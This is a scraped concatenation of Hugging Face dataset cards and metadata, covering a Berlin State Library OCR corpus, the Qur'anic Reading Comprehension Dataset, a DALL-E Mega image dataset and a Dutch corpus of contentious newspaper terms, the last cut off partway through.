* the CSV 'xml2csv\_alto.csv', which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the 'datasets' library
* this CSV was augmented with language information from 'URL' note some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information
* the CSV was further augmented by trying to map the PPN to fields in a metadata download created using URL note not all examples are successfully matched to this metadata download.
#### Who are the source language producers?
### Annotations
#### Annotation process
This dataset contains machine-produced annotations for:
* the confidence scores the OCR engines used to produce the full-text materials.
* the predicted languages and associated confidence scores produced by 'URL'
The dataset also contains metadata for the following fields:
* author
* publisher
* the place of publication
* title
#### Who are the annotators?
### Personal and Sensitive Information
This dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
### Discussion of Biases
As with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.
### Other Known Limitations
Additional Information
----------------------
### Dataset Curators
Initial data created by: Labusch, Kai; Zellhöfer, David
### Licensing Information
Creative Commons Attribution 4.0 International
### Contributions
Thanks to @davanstrien for adding this dataset.
| [
"### Dataset Summary\n\n\n\n> \n> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.\n> \n> \n> \n\n\n\n> \n> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.\n> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).\n> \n> \n>",
"### Supported Tasks and Leaderboards\n\n\n* 'language-modeling': this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.\n*",
"### Languages\n\n\nThe collection includes material across a large number of languages. The languages of the OCR text have been detected using URL: An Off-the-shelf Language Identification Tool (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. Note: not all examples may have been successfully matched to the language prediction table from the original data.\n\n\nThe frequency of the top ten languages in the dataset is shown below:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nEach example represents a single page of OCR'd text.\n\n\nA single example of the dataset is as follows:",
"### Data Fields\n\n\n* 'file name': filename of the original XML file\n* 'text': OCR'd text for that page of the item\n* 'wc': the word confidence for each token predicted by the OCR engine\n* 'ppn': 'Pica production numbers' an internal ID used by the library. See \n-'language\\_confidence': confidence score given by 'URL'\n* publisher: publisher of the item in which the text appears\n* place: place of publication of the item in which the text appears\n* date: date of the item in which the text appears\n* title: title of the item in which the text appears\n* aut: author of the item in which the text appears",
"### Data Splits\n\n\nThis dataset contains only a single split 'train'.\n\n\nDataset Creation\n----------------\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo.",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.\n\n\nThe URL was used to create this dataset.\n\n\nTo make the dataset more useful for training language models, the following steps were carried out:\n\n\n* the CSV 'xml2csv\\_alto.csv', which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the 'datasets' library\n* this CSV was augmented with language information from 'URL' note some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information\n* the CSV was further augmented by trying to map the PPN to fields in a metadata download created using URL note not all examples are successfully matched to this metadata download.",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process\n\n\nThis dataset contains machine-produced annotations for:\n\n\n* the confidence scores the OCR engines used to produce the full-text materials.\n* the predicted languages and associated confidence scores produced by 'URL'\n\n\nThe dataset also contains metadata for the following fields:\n\n\n* author\n* publisher\n* the place of publication\n* title",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nThis dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases\n\n\nAs with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nInitial data created by: Labusch, Kai; Zellhöfer, David",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International",
"### Contributions\n\n\nThanks to @davanstrien for adding this dataset."
] | [
"TAGS\n#task_categories-fill-mask #task_categories-text-generation #task_ids-masked-language-modeling #task_ids-language-modeling #annotations_creators-machine-generated #language_creators-expert-generated #multilinguality-multilingual #size_categories-1M<n<10M #language-German #language-Dutch #language-English #language-French #language-Spanish #license-cc-by-4.0 #ocr #library #region-us \n",
"### Dataset Summary\n\n\n\n> \n> The digital collections of the SBB contain 153,942 digitized works from the time period of 1470 to 1945.\n> \n> \n> \n\n\n\n> \n> At the time of publication, 28,909 works have been OCR-processed resulting in 4,988,099 full-text pages.\n> For each page with OCR text, the language has been determined by langid (Lui/Baldwin 2012).\n> \n> \n>",
"### Supported Tasks and Leaderboards\n\n\n* 'language-modeling': this dataset has the potential to be used for training language models on historical/OCR'd text. Since it contains OCR confidence, language and date information for many examples, it is also possible to filter this dataset to more closely match the requirements for training data.\n*",
"### Languages\n\n\nThe collection includes material across a large number of languages. The languages of the OCR text have been detected using URL: An Off-the-shelf Language Identification Tool (Lui & Baldwin, ACL 2012). The dataset includes a confidence score for the language prediction. Note: not all examples may have been successfully matched to the language prediction table from the original data.\n\n\nThe frequency of the top ten languages in the dataset is shown below:\n\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nEach example represents a single page of OCR'd text.\n\n\nA single example of the dataset is as follows:",
"### Data Fields\n\n\n* 'file name': filename of the original XML file\n* 'text': OCR'd text for that page of the item\n* 'wc': the word confidence for each token predicted by the OCR engine\n* 'ppn': 'Pica production numbers' an internal ID used by the library. See \n-'language\\_confidence': confidence score given by 'URL'\n* publisher: publisher of the item in which the text appears\n* place: place of publication of the item in which the text appears\n* date: date of the item in which the text appears\n* title: title of the item in which the text appears\n* aut: author of the item in which the text appears",
"### Data Splits\n\n\nThis dataset contains only a single split 'train'.\n\n\nDataset Creation\n----------------\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo.",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization\n\n\nThe dataset is created from OCR fulltexts of the Digital Collections of the Berlin State Library (DC-SBB) hosted on Zenodo. This dataset includes text content produced through running Optical Character Recognition across 153,942 digitized works held by the Berlin State Library.\n\n\nThe URL was used to create this dataset.\n\n\nTo make the dataset more useful for training language models, the following steps were carried out:\n\n\n* the CSV 'xml2csv\\_alto.csv', which contains the full text corpus per document page (incl.OCR word confidences) was loaded using the 'datasets' library\n* this CSV was augmented with language information from 'URL' note some examples don't find a match for this. Sometimes this is because a text is blank, but some actual text may be missing predicted language information\n* the CSV was further augmented by trying to map the PPN to fields in a metadata download created using URL note not all examples are successfully matched to this metadata download.",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process\n\n\nThis dataset contains machine-produced annotations for:\n\n\n* the confidence scores the OCR engines used to produce the full-text materials.\n* the predicted languages and associated confidence scores produced by 'URL'\n\n\nThe dataset also contains metadata for the following fields:\n\n\n* author\n* publisher\n* the place of publication\n* title",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nThis dataset contains historical material, potentially including names, addresses etc., but these are not likely to refer to living individuals.\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases\n\n\nAs with any historical material, the views and attitudes expressed in some texts will likely diverge from contemporary beliefs. One should consider carefully how this potential bias may become reflected in language models trained on this data.",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators\n\n\nInitial data created by: Labusch, Kai; Zellhöfer, David",
"### Licensing Information\n\n\nCreative Commons Attribution 4.0 International",
"### Contributions\n\n\nThanks to @davanstrien for adding this dataset."
] |
88b10b40e3197c83f2995771e057515f584ecd27 |
# Dataset Card for the Qur'anic Reading Comprehension Dataset (QRCD)
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://sites.google.com/view/quran-qa-2022/home
- **Repository:** https://gitlab.com/bigirqu/quranqa/-/tree/main/
- **Paper:** https://dl.acm.org/doi/10.1145/3400396
- **Leaderboard:**
- **Point of Contact:** @piraka9011
### Dataset Summary
The QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are
coupled with their extracted answers to constitute 1,337 question-passage-answer triplets.
### Supported Tasks and Leaderboards
This task is evaluated as a ranking task.
To give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully
match one of the gold answers but partially matches it, we use the partial Reciprocal Rank (pRR) measure.
It is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.
pRR is the official evaluation measure of this shared task.
We will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only to the top predicted answer.
The EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the
gold answers.
In contrast, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.
To get an overall evaluation score, each of the above measures is averaged over all questions.
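
To make these definitions concrete, here is a minimal sketch of the three measures for a single question. The whitespace tokenization and the pRR formulation are simplifications of whatever normalization the official scorer applies, so treat this as illustrative only.

```python
def exact_match(predicted: str, gold_answers: list) -> int:
    # EM is binary: 1 only if the top prediction exactly matches a gold answer.
    return int(any(predicted == gold for gold in gold_answers))


def f1_at_1(predicted: str, gold_answers: list) -> float:
    # Token-overlap F1 between the top prediction and the best-matching gold answer.
    pred_tokens = predicted.split()
    best = 0.0
    for gold in gold_answers:
        gold_tokens = gold.split()
        common = sum(min(pred_tokens.count(t), gold_tokens.count(t)) for t in set(pred_tokens))
        if common == 0:
            continue
        precision = common / len(pred_tokens)
        recall = common / len(gold_tokens)
        best = max(best, 2 * precision * recall / (precision + recall))
    return best


def partial_reciprocal_rank(ranked_predictions: list, gold_answers: list) -> float:
    # Assumption about pRR: scale 1/rank of the first answer with a nonzero
    # token-overlap score by that score; the official definition may differ.
    for rank, predicted in enumerate(ranked_predictions, start=1):
        score = f1_at_1(predicted, gold_answers)
        if score > 0:
            return score / rank
    return 0.0
```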
### Languages
Qur'anic Arabic
## Dataset Structure
### Data Instances
To simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain
one or more answers to that question, as shown below:
```json
{
"pq_id": "38:41-44_105",
"passage": "واذكر عبدنا أيوب إذ نادى ربه أني مسني الشيطان بنصب وعذاب. اركض برجلك هذا مغتسل بارد وشراب. ووهبنا له أهله ومثلهم معهم رحمة منا وذكرى لأولي الألباب. وخذ بيدك ضغثا فاضرب به ولا تحنث إنا وجدناه صابرا نعم العبد إنه أواب.",
"surah": 38,
"verses": "41-44",
"question": "من هو النبي المعروف بالصبر؟",
"answers": [
{
"text": "أيوب",
"start_char": 12
}
]
}
```
Each Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different
question.
Likewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a
different Qur’anic passage.
The source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the
Holy Qur'an in several scripting styles.
We have chosen the simple-clean text style of Tanzil version 1.0.2.
### Data Fields
* `pq_id`: Sample ID
* `passage`: Context text
* `surah`: Surah number
* `verses`: Verse range
* `question`: Question text
* `answers`: List of answers and their start character
### Data Splits
| **Dataset** | **%** | **# Question-Passage Pairs** | **# Question-Passage-Answer Triplets** |
|-------------|:-----:|:-----------------------------:|:---------------------------------------:|
| Training | 65% | 710 | 861 |
| Development | 10% | 109 | 128 |
| Test | 25% | 274 | 348 |
| All | 100% | 1,093 | 1,337 |
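
A minimal loading sketch is shown below. The assumption that the default config exposes `train`, `validation`, and `test` splits mirrors the table above but has not been verified against the repository.

```python
from datasets import load_dataset

# Assumption: splits are named train/validation/test, matching the table above.
qrcd = load_dataset("tarteel-ai/quranqa")
sample = qrcd["train"][0]
print(sample["question"], sample["answers"])
```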
## Dataset Creation
### Curation Rationale
[More Information Needed]
### Source Data
#### Initial Data Collection and Normalization
[More Information Needed]
#### Who are the source language producers?
[More Information Needed]
### Annotations
#### Annotation process
[More Information Needed]
#### Who are the annotators?
[More Information Needed]
### Personal and Sensitive Information
[More Information Needed]
## Considerations for Using the Data
### Social Impact of Dataset
[More Information Needed]
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
The QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License https://creativecommons.org/licenses/by-nd/4.0/legalcode
For a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to https://creativecommons.org/licenses/by-nd/4.0/
### Citation Information
```
@article{malhas2020ayatec,
author = {Malhas, Rana and Elsayed, Tamer},
title = {AyaTEC: Building a Reusable Verse-Based Test Collection for Arabic Question Answering on the Holy Qur’an},
year = {2020},
issue_date = {November 2020},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {19},
number = {6},
issn = {2375-4699},
url = {https://doi.org/10.1145/3400396},
doi = {10.1145/3400396},
journal = {ACM Trans. Asian Low-Resour. Lang. Inf. Process.},
month = {oct},
articleno = {78},
numpages = {21},
keywords = {evaluation, Classical Arabic}
}
```
### Contributions
Thanks to [@piraka9011](https://github.com/piraka9011) for adding this dataset.
| tarteel-ai/quranqa | [
"task_categories:question-answering",
"task_ids:extractive-qa",
"annotations_creators:expert-generated",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:n<1K",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:ar",
"license:cc-by-nd-4.0",
"quran",
"qa",
"region:us"
] | 2022-07-26T19:05:10+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": ["expert-generated"], "language": ["ar"], "license": ["cc-by-nd-4.0"], "multilinguality": ["monolingual"], "size_categories": ["n<1K", "1K<n<10K"], "source_datasets": ["original"], "task_categories": ["question-answering"], "task_ids": ["extractive-qa"], "pretty_name": "Qur'anic Reading Comprehension Dataset", "tags": ["quran", "qa"]} | 2022-07-27T01:28:31+00:00 | [] | [
"ar"
] | TAGS
#task_categories-question-answering #task_ids-extractive-qa #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-n<1K #size_categories-1K<n<10K #source_datasets-original #language-Arabic #license-cc-by-nd-4.0 #quran #qa #region-us
| Dataset Card for the Qur'anic Reading Comprehension Dataset (QRCD)
==================================================================
Table of Contents
-----------------
* Table of Contents
* Dataset Description
+ Dataset Summary
+ Supported Tasks and Leaderboards
+ Languages
* Dataset Structure
+ Data Instances
+ Data Fields
+ Data Splits
* Dataset Creation
+ Curation Rationale
+ Source Data
+ Annotations
+ Personal and Sensitive Information
* Considerations for Using the Data
+ Social Impact of Dataset
+ Discussion of Biases
+ Other Known Limitations
* Additional Information
+ Dataset Curators
+ Licensing Information
+ Citation Information
+ Contributions
Dataset Description
-------------------
* Homepage: URL
* Repository: URL
* Paper: URL
* Leaderboard:
* Point of Contact: @piraka9011
### Dataset Summary
The QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are
coupled with their extracted answers to constitute 1,337 question-passage-answer triplets.
### Supported Tasks and Leaderboards
This task is evaluated as a ranking task.
To give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully
match one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.
It is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.
pRR is the official evaluation measure of this shared task.
We will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.
The EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the
gold answers.
Whereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.
To get an overall evaluation score, each of the above measures is averaged over all questions.
### Languages
Qur'anic Arabic
Dataset Structure
-----------------
### Data Instances
To simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain
one or more answers to that question, as shown below:
Each Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different
question.
Likewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a
different Qur’anic passage.
The source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the
Holy Qur'an in several scripting styles.
We have chosen the simple-clean text style of Tanzil version 1.0.2.
### Data Fields
* 'pq\_id': Sample ID
* 'passage': Context text
* 'surah': Surah number
* 'verses': Verse range
* 'question': Question text
* 'answers': List of answers and their start character
### Data Splits
Dataset Creation
----------------
### Curation Rationale
### Source Data
#### Initial Data Collection and Normalization
#### Who are the source language producers?
### Annotations
#### Annotation process
#### Who are the annotators?
### Personal and Sensitive Information
Considerations for Using the Data
---------------------------------
### Social Impact of Dataset
### Discussion of Biases
### Other Known Limitations
Additional Information
----------------------
### Dataset Curators
### Licensing Information
The QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License URL
For a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to URL
### Contributions
Thanks to @piraka9011 for adding this dataset.
| [
"### Dataset Summary\n\n\nThe QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are\ncoupled with their extracted answers to constitute 1,337 question-passage-answer triplets.",
"### Supported Tasks and Leaderboards\n\n\nThis task is evaluated as a ranking task.\nTo give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully\nmatch one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.\nIt is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.\npRR is the official evaluation measure of this shared task.\nWe will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.\nThe EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the\ngold answers.\nWhereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.\nTo get an overall evaluation score, each of the above measures is averaged over all questions.",
"### Languages\n\n\nQur'anic Arabic\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nTo simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain\none or more answers to that question, as shown below:\n\n\nEach Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different\nquestion.\nLikewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a\ndifferent Qur’anic passage.\nThe source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the\nHoly Qur'an in several scripting styles.\nWe have chosen the simple-clean text style of Tanzil version 1.0.2.",
"### Data Fields\n\n\n* 'pq\\_id': Sample ID\n* 'passage': Context text\n* 'surah': Surah number\n* 'verses': Verse range\n* 'question': Question text\n* 'answers': List of answers and their start character",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nThe QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License URL\nFor a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to URL",
"### Contributions\n\n\nThanks to @piraka9011 for adding this dataset."
] | [
"TAGS\n#task_categories-question-answering #task_ids-extractive-qa #annotations_creators-expert-generated #language_creators-expert-generated #multilinguality-monolingual #size_categories-n<1K #size_categories-1K<n<10K #source_datasets-original #language-Arabic #license-cc-by-nd-4.0 #quran #qa #region-us \n",
"### Dataset Summary\n\n\nThe QRCD (Qur'anic Reading Comprehension Dataset) is composed of 1,093 tuples of question-passage pairs that are\ncoupled with their extracted answers to constitute 1,337 question-passage-answer triplets.",
"### Supported Tasks and Leaderboards\n\n\nThis task is evaluated as a ranking task.\nTo give credit to a QA system that may retrieve an answer (not necessarily at the first rank) that does not fully\nmatch one of the gold answers but partially matches it, we use partial Reciprocal Rank (pRR) measure.\nIt is a variant of the traditional Reciprocal Rank evaluation metric that considers partial matching.\npRR is the official evaluation measure of this shared task.\nWe will also report Exact Match (EM) and F1@1, which are evaluation metrics applied only on the top predicted answer.\nThe EM metric is a binary measure that rewards a system only if the top predicted answer exactly matches one of the\ngold answers.\nWhereas, the F1@1 metric measures the token overlap between the top predicted answer and the best matching gold answer.\nTo get an overall evaluation score, each of the above measures is averaged over all questions.",
"### Languages\n\n\nQur'anic Arabic\n\n\nDataset Structure\n-----------------",
"### Data Instances\n\n\nTo simplify the structure of the dataset, each tuple contains one passage, one question and a list that may contain\none or more answers to that question, as shown below:\n\n\nEach Qur’anic passage in QRCD may have more than one occurrence; and each passage occurrence is paired with a different\nquestion.\nLikewise, each question in QRCD may have more than one occurrence; and each question occurrence is paired with a\ndifferent Qur’anic passage.\nThe source of the Qur'anic text in QRCD is the Tanzil project download page, which provides verified versions of the\nHoly Qur'an in several scripting styles.\nWe have chosen the simple-clean text style of Tanzil version 1.0.2.",
"### Data Fields\n\n\n* 'pq\\_id': Sample ID\n* 'passage': Context text\n* 'surah': Surah number\n* 'verses': Verse range\n* 'question': Question text\n* 'answers': List of answers and their start character",
"### Data Splits\n\n\n\nDataset Creation\n----------------",
"### Curation Rationale",
"### Source Data",
"#### Initial Data Collection and Normalization",
"#### Who are the source language producers?",
"### Annotations",
"#### Annotation process",
"#### Who are the annotators?",
"### Personal and Sensitive Information\n\n\nConsiderations for Using the Data\n---------------------------------",
"### Social Impact of Dataset",
"### Discussion of Biases",
"### Other Known Limitations\n\n\nAdditional Information\n----------------------",
"### Dataset Curators",
"### Licensing Information\n\n\nThe QRCD v1.1 dataset is distributed under the CC-BY-ND 4.0 License URL\nFor a human-readable summary of (and not a substitute for) the above CC-BY-ND 4.0 License, please refer to URL",
"### Contributions\n\n\nThanks to @piraka9011 for adding this dataset."
] |
e7d4f3001b1c33740f10caa51c61cd4199e831e0 |
DallData is a non-exhaustive look into the unconditional image generation of DALL-E Mega (1). This dataset is released under the [BirdL-AirL License](https://huggingface.co/spaces/BirdL/license/).
(1)
```bibtex
@misc{Dayma_DALL·E_Mini_2021,
author = {Dayma, Boris and Patil, Suraj and Cuenca, Pedro and Saifullah, Khalid and Abraham, Tanishq and Lê Khắc, Phúc and Melas, Luke and Ghosh, Ritobrata},
doi = {10.5281/zenodo.5146400},
month = {7},
title = {DALL·E Mini},
url = {https://github.com/borisdayma/dalle-mini},
year = {2021}
}
``` | BirdL/DallData | [
"task_categories:unconditional-image-generation",
"size_categories:1K<n<10K",
"license:other",
"region:us"
] | 2022-07-26T19:48:02+00:00 | {"annotations_creators": [], "language_creators": [], "language": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["unconditional-image-generation"], "task_ids": [], "pretty_name": "DALL-E Latent Space Mapping", "tags": []} | 2022-09-28T20:12:02+00:00 | [] | [] | TAGS
#task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us
|
DallData is a non-exhaustive look into DALL-E Mega(1)'s unconditional image generation. This is under the BirdL-AirL License.
(1)
| [] | [
"TAGS\n#task_categories-unconditional-image-generation #size_categories-1K<n<10K #license-other #region-us \n"
] |
794edc666ccae9f296d033a99a826a3f41f34385 | # Dataset Card for Contentious Contexts Corpus
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
## Dataset Description
- **Homepage:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Repository:** [ConConCor](https://github.com/cultural-ai/ConConCor)
- **Paper:** [N/A]
- **Leaderboard:** [N/A]
- **Point of Contact:** [Jacco van Ossenbruggen](https://github.com/jrvosse)
**Note** One can also find a Datasheet produced by the creators of this dataset as a [PDF document](https://github.com/cultural-ai/ConConCor/blob/main/Dataset/DataSheet.pdf)
### Dataset Summary
This dataset contains extracts from historical Dutch newspapers that include potentially contentious keywords (according to present-day sensibilities). Each instance carries multiple annotations, which makes it possible to quantify inter-annotator agreement. The dataset can be used to track how words and their meanings have changed and become contentious over time.
### Supported Tasks and Leaderboards
- `text-classification`: This dataset can be used for tracking how the meanings of words in different contexts have changed and become contentious over time
### Languages
The text in the dataset is in Dutch. The responses are available in both English and Dutch. Suggestions, where present, are only in Dutch. The associated BCP-47 code is `nl`
## Dataset Structure
### Data Instances
```
{
'extract_id': 'H97',
'text': 'en waardoor het eerste doel wordt voorbijgestreefd om voor den 5D5c5Y 5d-5@5j5g5d5e5Z5V5V5c een speciale eigen werkingssfeer te
scheppen.Intusschen is het',
'target': '5D 5c5Y5d-5@5j5g5d5e5Z5V5V5c',
'annotator_responses_english': [
{'id': 'unknown_2a', 'response': 'Not contentious'},
{'id': 'unknown_2b', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2c', 'response': "I don't know"},
{'id': 'unknown_2d', 'response': 'Contentious according to current standards'},
{'id': 'unknown_2e', 'response': 'Not contentious'},
{'id': 'unknown_2f', 'response': "I don't know"},
{'id': 'unknown_2g', 'response': 'Not contentious'}],
'annotator_responses_dutch': [
{'id': 'unknown_2a', 'response': 'Niet omstreden'},
{'id': 'unknown_2b', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2c', 'response': 'Weet ik niet'},
{'id': 'unknown_2d', 'response': 'Omstreden naar huidige maatstaven'},
{'id': 'unknown_2e', 'response': 'Niet omstreden'},
{'id': 'unknown_2f', 'response': 'Weet ik niet'},
{'id': 'unknown_2g', 'response': 'Niet omstreden'}],
'annotator_suggestions': [
{'id': 'unknown_2a', 'suggestion': ''},
{'id': 'unknown_2b', 'suggestion': 'ander ras nodig'},
{'id': 'unknown_2c', 'suggestion': 'personen van ander ras'},
{'id': 'unknown_2d', 'suggestion': ''},
{'id': 'unknown_2e', 'suggestion': ''},
{'id': 'unknown_2f', 'suggestion': ''},
{'id': 'unknown_2g', 'suggestion': 'ras'}]
}
```
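As a sketch, the extract above could be loaded with the Hugging Face `datasets` library (the repository id is taken from this card; `train` is the only split listed under Data Splits):
```python
from datasets import load_dataset

concon = load_dataset("biglam/contentious_contexts", split="train")
example = concon[0]
print(example["target"])
print([r["response"] for r in example["annotator_responses_english"]])
```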
### Data Fields
|extract_id|text|target|annotator_responses_english|annotator_responses_dutch|annotator_suggestions|
|---|---|---|---|---|---|
|Unique identifier|Extract text|Target phrase or word|Responses (translated to English)|Responses in Dutch|Suggestions, if present|
### Data Splits
Train: 2720
## Dataset Creation
### Curation Rationale
> Cultural heritage institutions recognise the problem of language use in their collections. The cultural objects in archives, libraries, and museums contain words and phrases that are inappropriate in modern society but were used broadly back in times. Such words can be offensive and discriminative. In our work, we use the term "contentious" to refer to all (potentially) inappropriate or otherwise sensitive words. For example, words suggestive of some (implicit or explicit) bias towards or against something. The National Archives of the Netherlands stated that they "explore the possibility of explaining language that was acceptable and common in the past and providing it with contemporary alternatives", meanwhile "keeping the original descriptions [with contentious words], because they give an idea of the time in which they were made or included in the collection". There is a page on the institution website where people can report "offensive language".
### Source Data
#### Initial Data Collection and Normalization
> The queries were run on OCR'd versions of the Europeana Newspaper collection, as provided by the KB National Library of the Netherlands. We limited our pool to text categorised as "article", thus excluding other types of texts such as advertisements and family notices. We then only focused our sample on the 6 decades between 1890-01-01 and 1941-12-31, as this is the period available in the Europeana newspaper corpus. The dataset represents a stratified sample set over target word, decade, and newspaper issue distribution metadata. For the final set of extracts for annotation, we gave extracts sampling weights proportional to their actual probabilities, as estimated from the initial set of extracts via trigram frequencies, rather than sampling uniformly.
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
> The annotation process included 3 stages: pilot annotation, expert annotation, and crowdsourced annotation on the "Prolific" platform. All stages required the participation of Dutch speakers. The pilot stage was intended for testing the annotation layout, the instructions clarity, the number of sentences provided as context, the survey questions, and the difficulty of the task in general. The Dutch-speaking members of the Cultural AI Lab were asked to test the annotation process and give their feedback anonymously using Google Sheets. Six volunteers contributed to the pilot stage, each annotating the same 40 samples where either a context of 3 or 5 sentences surrounding the term were given. An individual annotation sheet had a table layout with 4 options to choose for every sample
> - 'Omstreden'(Contentious)
